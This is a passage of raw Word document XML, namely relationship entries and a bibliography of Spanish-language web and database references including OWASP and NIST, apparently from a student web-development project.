Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.4rsoluciones.com/blog/mobile-first-otro-enfoque-para-crear-sitios-web-multiplataforma-2/" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.tmp"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.tmp"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.tmp"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.tmp"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.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hyperlink" Target="http://ftp.tcrc.edu.tw/MySQL/doc/refman/5.0/es/features.html" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nodejs.org/" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header6.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header8.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/es/docs/JavaScript/Acerca_de_JavaScript" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpeg"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.tmp"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.tmp"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.tmp"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.tmp"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.jpeg"/><Relationship Id="rId111"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ftp.tcrc.edu.tw/MySQL/doc/refman/5.0/es/features.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ftp.tcrc.edu.tw/MySQL/doc/refman/5.0/es/features.html" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/First-class_functions" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://foundation.zurb.com/" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer7.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Glossary/API" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.tmp"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.tmp"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.tmp"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.tmp"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header5.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.tmp"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.gif"/><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4.jpeg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpeg"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://couchdb.apache.org/" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer8.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.4rsoluciones.com/blog/diseno-web-responsivo-muchos-tamanos-una-solucion-4/" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.tmp"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer6.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.jpeg"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.tmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ftp.tcrc.edu.tw/MySQL/doc/refman/5.0/es/features.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AJD18</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{7C077705-42B5-43B3-9597-945F7FE9A097}</b:Guid>
    <b:Title>AJDP Soft</b:Title>
    <b:Year>2018</b:Year>
    <b:URL>http://www.ajpdsoft.com/modules.php?name=Encyclopedia&amp;op=content&amp;tid=820</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Apa18</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{FDF59BF4-D1AF-430F-8723-00F23BE55919}</b:Guid>
    <b:Title>Apache foundation</b:Title>
    <b:Year>2018</b:Year>
    <b:URL>https://apachefoundation.wikispaces.com/Apache+Tomcat</b:URL>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ent15</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{234E327E-A4B6-4C5B-8DDA-78DF1A5C6316}</b:Guid>
    <b:Title>Entre Desarrolladores</b:Title>
    <b:Year>2015</b:Year>
    <b:Month>Enero</b:Month>
    <b:Day>24</b:Day>
    <b:URL>https://entredesarrolladores.com/6896/apache-tomcat-8-0-9-vs-glassfish-server-4-1</b:URL>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Jim12</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{C475E6C3-EB8C-4B04-A831-1A23F9FA4D89}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Jiménez Flores, Oscar, Méndez Vilchis, Mario Alberto, Montero Márquez, Andrés, Morales Vilchis, Diana &amp; Velasco Esquivel, Victor Ernesto</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Universidad Nacional Autónoma de México Facultad de Ingeniería</b:Title>
    <b:InternetSiteTitle>Desarrollo de un portal en internet, para empresa que comercializa Bolsos</b:InternetSiteTitle>
    <b:Year>2012</b:Year>
    <b:URL>www.ptolomeo.unam.mx</b:URL>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mej11</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{A1194F97-6501-4733-8E9D-8E9BA7A2EE11}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Mejia</b:Last>
            <b:First>Antonio</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Slidershare</b:Title>
    <b:InternetSiteTitle>Ventajas y desventajas de los servidores apache y IIS</b:InternetSiteTitle>
    <b:Year>2011</b:Year>
    <b:Month>Junio</b:Month>
    <b:Day>11</b:Day>
    <b:URL>https://es.slideshare.net/Anthony_mejias/ventajas-y-desventajas-de-los-servidores-apache-y-iis</b:URL>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MyS10</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{96D9D90E-F146-49E6-B15A-5723DF177E9E}</b:Guid>
    <b:Title>MySQL Developer Zone</b:Title>
    <b:InternetSiteTitle>Las principales características de MySQL</b:InternetSiteTitle>
    <b:Year>2010</b:Year>
    <b:URL>http://ftp.tcrc.edu.tw/MySQL/doc/refman/5.0/es/features.html</b:URL>
    <b:RefOrder>10</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Qui10</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{BD884239-7F30-4F1B-9112-27D0DF75EF8E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Quijado</b:Last>
            <b:First>José</b:First>
            <b:Middle>López</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Domine PHP y MYSQL</b:Title>
    <b:Year>2010</b:Year>
    <b:City>México</b:City>
    <b:Publisher>RA-MA Editorial</b:Publisher>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Pér04</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{89625127-F69B-44E8-AE52-1D8BF3D157C6}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>César</b:Last>
            <b:First>Pérez</b:First>
            <b:Middle>López</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>MySQL para Windows y Linux</b:Title>
    <b:Year>2004</b:Year>
    <b:City>México, df</b:City>
    <b:Publisher>Alfaomega Grupo Editor S.A de C.V</b:Publisher>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Pue04</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{2FE0C6AE-4F59-4A49-BAF1-073EEA99AEED}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Puertas</b:Last>
            <b:First>Jacobo</b:First>
            <b:Middle>Pavón</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Creación de un portal con PHP y MYSQL</b:Title>
    <b:Year>2004</b:Year>
    <b:City>México</b:City>
    <b:Publisher>RA-MA editorial</b:Publisher>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Tut10</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{C04DC94E-9809-44C0-8405-D849F10C1254}</b:Guid>
    <b:Title>OpenLibra</b:Title>
    <b:InternetSiteTitle>OpenLibra - MySQL</b:InternetSiteTitle>
    <b:Year>2010</b:Year>
    <b:URL>https://openlibra.com/es/book/mysql-tutorial</b:URL>
    <b:Author>
      <b:Editor>
        <b:NameList>
          <b:Person>
            <b:Last>Tutorialspoint.com</b:Last>
          </b:Person>
        </b:NameList>
      </b:Editor>
    </b:Author>
    <b:RefOrder>9</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sup14</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{C205F81F-274B-4ABF-9B8D-43D981C588C4}</b:Guid>
    <b:Title>Super Información Web</b:Title>
    <b:Year>2014</b:Year>
    <b:URL>http://superinformacionweb.blogspot.mx/2014/11/ventajas-y-desventajas-de-mysql.html</b:URL>
    <b:RefOrder>11</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>San18</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{FF0C56E4-E234-45E2-B3E2-3E6B9277BAF0}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Santamaria, José &amp; Hernández, Javier</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>IES San Vicente </b:Title>
    <b:InternetSiteTitle>IES San Vicente - Microsoft SQL Server</b:InternetSiteTitle>
    <b:Year>2018</b:Year>
    <b:URL>https://iessanvicente.com/colaboraciones/sqlserver.pdf</b:URL>
    <b:RefOrder>12</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SQL18</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{FA03B0BC-2078-49CE-BF63-34BF9DCB1468}</b:Guid>
    <b:Title>SQL Server</b:Title>
    <b:Year>2018</b:Year>
    <b:URL>https://sqlserver4b.weebly.com/ventajas-y-desventajas.html</b:URL>
    <b:RefOrder>13</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Var16</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{A091E6D7-D519-4FD3-9F1B-23CBD16D7826}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Varela</b:Last>
            <b:First>Marcial</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Cursos femxa.es</b:Title>
    <b:InternetSiteTitle>Cursos femxa.es - 5 Grandes ventajas de Oracle</b:InternetSiteTitle>
    <b:Year>2016</b:Year>
    <b:Month>Marzo</b:Month>
    <b:Day>22</b:Day>
    <b:URL>https://www.cursosfemxa.es/blog/desarrollo-profesional/5-ventajas-oracle</b:URL>
    <b:RefOrder>14</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Guz12</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{FC058B84-DB5C-40ED-92F4-63BD2BBC48EA}</b:Guid>
    <b:Title>BIBLIOTECAECEST</b:Title>
    <b:InternetSiteTitle>BIBLIOTECAECEST - Aplicaciones computacionales para la simplificación del manejo administrativo de una institución de educación superior</b:InternetSiteTitle>
    <b:Year>2012</b:Year>
    <b:URL>http://www.repositoriodigital.ipn.mx/handle/123456789/6329</b:URL>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Guzmán Sánchez Mejorado</b:Last>
            <b:First>Carlos</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
      <b:Editor>
        <b:NameList>
          <b:Person>
            <b:Last>Nacional</b:Last>
            <b:First>Instituto</b:First>
            <b:Middle>Politécnico</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Editor>
    </b:Author>
    <b:RefOrder>23</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Uni02</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{DCE54F32-8BBD-4A93-BCAD-3E49C6BA6F7B}</b:Guid>
    <b:Title>Universidad de allende</b:Title>
    <b:InternetSiteTitle>Universidad de allende - Productos para desarrollar aplicaicones web: ASP, CFM, JSP y PHP</b:InternetSiteTitle>
    <b:Year>2002</b:Year>
    <b:URL>https://rua.ua.es/dspace/bitstream/10045/14015/4/2-asp-cfm-jsp-php.pdf</b:URL>
    <b:RefOrder>24</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Rom14</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{585BEC7E-7362-4EEA-868D-ED3B022D5704}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Román Muñoz, Fernando, Sabido Cortés, Iván Israel &amp; García Villalba, Luis Javier</b:Corporate>
      </b:Author>
      <b:Editor>
        <b:NameList>
          <b:Person>
            <b:Last>Alicante</b:Last>
            <b:First>Universidad</b:First>
            <b:Middle>de</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Editor>
    </b:Author>
    <b:Title>BIBLIOTECAECEST</b:Title>
    <b:InternetSiteTitle>BIBLIOTECAECEST - Capacidades de detección de las herramientas de análisis de vulnerabilidades en aplicaciones web</b:InternetSiteTitle>
    <b:Year>2014</b:Year>
    <b:URL>https://rua.ua.es/dspace/bitstream/10045/40421/1/RECSI-2014_29.pdf</b:URL>
    <b:RefOrder>25</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Men14</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{D11380CD-1A02-4774-9565-8181448CA99D}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Ángel</b:Last>
            <b:First>Mendoza</b:First>
            <b:Middle>Miguel</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Welivesecurity</b:Title>
    <b:Year>2014</b:Year>
    <b:Month>Agosto</b:Month>
    <b:Day>04</b:Day>
    <b:URL>https://www.welivesecurity.com/la-es/2014/08/04/vulnerabilidades-que-es-cvss-como-utilizarlo/</b:URL>
    <b:RefOrder>17</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Cas14</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{7BE5D83A-470B-4BCC-8A74-E1AD1A65B414}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Joshimar</b:Last>
            <b:First>Castro</b:First>
            <b:Middle>Siguas</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Slideshare</b:Title>
    <b:Year>2014</b:Year>
    <b:Month>Marzo</b:Month>
    <b:Day>20</b:Day>
    <b:URL>https://es.slideshare.net/joshimarc/vulnerabilidades-web-32542315</b:URL>
    <b:RefOrder>18</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Wic17</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{CA536380-767F-4492-96E8-7DBCDB5F1E99}</b:Guid>
    <b:Title>OWASP</b:Title>
    <b:Year>2017</b:Year>
    <b:URL>https://www.owasp.org/index.php/Top_10-2017_Foreword</b:URL>
    <b:InternetSiteTitle>OWASP - Top 10 - 2017 Los diez riesgos más criticos en Aplicaciones Web</b:InternetSiteTitle>
    <b:RefOrder>19</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>pag18</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{76BF0EC7-04E5-4652-AD24-C1E515B7D14D}</b:Guid>
    <b:Title>pages.nist.gov</b:Title>
    <b:InternetSiteTitle>Authenticator and Verifier Requirements</b:InternetSiteTitle>
    <b:Year>2018</b:Year>
    <b:Month>Mayo</b:Month>
    <b:Day>13</b:Day>
    <b:URL>https://pages.nist.gov/800-63-3/sp800-63b.html#memsecret  </b:URL>
    <b:RefOrder>20</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Lea10</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{486069EA-ACEC-4C5A-A1BA-D92779B9DEA3}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Alegsa</b:Last>
            <b:First>Leandro</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>www.alegsa.com.ar</b:Title>
    <b:InternetSiteTitle>MP4</b:InternetSiteTitle>
    <b:Year>2010</b:Year>
    <b:Month>NOVIEMBRE</b:Month>
    <b:Day>14</b:Day>
    <b:URL>http://www.alegsa.com.ar/Dic/mp4.php</b:URL>
    <b:RefOrder>26</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Apo16</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{03E345C2-EC62-4CE0-A88E-F7B0069CFF0F}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Apowersoft</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>www.apowersoft.es</b:Title>
    <b:InternetSiteTitle>Formato MP4</b:InternetSiteTitle>
    <b:Year>2016</b:Year>
    <b:Month>ENERO</b:Month>
    <b:Day>12</b:Day>
    <b:URL>https://www.apowersoft.es/que-es-el-formato-mp4.html</b:URL>
    <b:RefOrder>27</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ces09</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{F403B83D-DB3A-4501-AB76-59BA269CE790}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Ceszpiicz's</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>ceszpiicz.wordpress.com</b:Title>
    <b:InternetSiteTitle>Ventajas y Desventajas del formato MP3</b:InternetSiteTitle>
    <b:Year>2009</b:Year>
    <b:Month>SEPTIEMBRE</b:Month>
    <b:Day>2</b:Day>
    <b:URL>https://ceszpiicz.wordpress.com/2009/09/02/%C2%BFcuales-son-las-ventajas-y-desventajas-del-formato-mp3/</b:URL>
    <b:RefOrder>28</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Rem18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{3FF35139-E65F-49D6-A0E4-5F1B98842A15}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Software</b:Last>
            <b:First>Remo</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>/www.remosoftware.com</b:Title>
    <b:InternetSiteTitle>archivos-avi-ventajas-y-desventajas-</b:InternetSiteTitle>
    <b:Year>2018</b:Year>
    <b:Month>FEBRERO</b:Month>
    <b:Day>1</b:Day>
    <b:URL>https://www.remosoftware.com/info/es/archivos-avi-ventajas-y-desventajas-y-como-abrir-uno/</b:URL>
    <b:RefOrder>29</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Nés18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{C5934B70-BBFE-4919-9861-B6BBA6EF8C0A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Valladares</b:Last>
            <b:First>Néstor</b:First>
            <b:Middle>Ariel Martínez</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>computerhelperblogs.blogspot.mx</b:Title>
    <b:InternetSiteTitle>Ventajas y desventajas de los formatos de música y sonidos</b:InternetSiteTitle>
    <b:Year>2018</b:Year>
    <b:Month>Mayo</b:Month>
    <b:Day>17</b:Day>
    <b:URL>http://computerhelperblogs.blogspot.mx/p/blog-page.html</b:URL>
    <b:RefOrder>30</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Dav18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{FC563263-3076-4AD1-AF37-56C339F4D73A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Ward</b:Last>
            <b:First>David</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>techlandia.com</b:Title>
    <b:InternetSiteTitle>WMV</b:InternetSiteTitle>
    <b:Year>2018</b:Year>
    <b:Month>MAYO</b:Month>
    <b:Day>17</b:Day>
    <b:URL>https://techlandia.com/wmv-info_295712/</b:URL>
    <b:RefOrder>31</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>www181</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{2FE1A37F-3330-427D-8F06-16AF0F181669}</b:Guid>
    <b:Title>www.ite.educacion.es</b:Title>
    <b:InternetSiteTitle>Formatos de audio</b:InternetSiteTitle>
    <b:Year>2018</b:Year>
    <b:Month>MAYO</b:Month>
    <b:Day>17</b:Day>
    <b:URL>http://www.ite.educacion.es/formacion/materiales/107/cd/audio/audio0102.html</b:URL>
    <b:RefOrder>32</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>www182</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{9ED42655-6997-4BD0-87F0-9474EF3CE73E}</b:Guid>
    <b:Title>www.coolutils.com</b:Title>
    <b:InternetSiteTitle>OGG</b:InternetSiteTitle>
    <b:Year>2018</b:Year>
    <b:Month>MAYO</b:Month>
    <b:Day>17</b:Day>
    <b:URL>https://www.coolutils.com/es/Formats/OGG</b:URL>
    <b:RefOrder>33</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Jua10</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{88D0F0F0-7402-4C10-A1C6-59FBB4250241}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Carlos</b:Last>
            <b:First>Juan</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>psicologiayempresa.com</b:Title>
    <b:InternetSiteTitle>Factores más usados en la evaluación de desempeño</b:InternetSiteTitle>
    <b:Year>2010</b:Year>
    <b:Month>DICIEMBRE</b:Month>
    <b:Day>26</b:Day>
    <b:URL>https://psicologiayempresa.com/factores-mas-usados-en-la-evaluacion-de-desempeno.html</b:URL>
    <b:RefOrder>34</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Nor12</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{3E08540E-C228-4F31-9A96-D08163652585}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Figuerola</b:Last>
            <b:First>Norberto</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>articulospm.files.wordpress.com</b:Title>
    <b:InternetSiteTitle>Matriz de Asignación de Responsabilidades (RAM)</b:InternetSiteTitle>
    <b:Year>2012</b:Year>
    <b:Month>JUNIO</b:Month>
    <b:URL>https://articulospm.files.wordpress.com/2012/07/matriz-de-asignacic3b3n-de-responsabilidades1.pdf</b:URL>
    <b:RefOrder>35</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Car18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{88085639-F578-428D-B905-847E35125493}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Hose</b:Last>
            <b:First>Carl</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>www.cuidatudinero.com</b:Title>
    <b:InternetSiteTitle>Desempeño laboral</b:InternetSiteTitle>
    <b:Year>2018</b:Year>
    <b:Month>FEBRERO</b:Month>
    <b:Day>1</b:Day>
    <b:URL>https://www.cuidatudinero.com/13098642/cual-es-la-definicion-de-desempeno-laboral</b:URL>
    <b:RefOrder>36</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>men18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{68A90D22-84C5-4322-8999-93F282B20916}</b:Guid>
    <b:Title>mentory.online</b:Title>
    <b:InternetSiteTitle>RACI o matriz de responsabilidades</b:InternetSiteTitle>
    <b:Year>2018</b:Year>
    <b:Month>FEBRERO </b:Month>
    <b:Day>15</b:Day>
    <b:URL>https://mentory.online/2018/02/raci-o-matriz-de-responsabilidades.html</b:URL>
    <b:RefOrder>37</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>sit18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{0175A678-2007-49A1-8DAB-2799426089F3}</b:Guid>
    <b:Title>sites.google.com</b:Title>
    <b:InternetSiteTitle>Matriz de asignación de responsabilidades (RACI)</b:InternetSiteTitle>
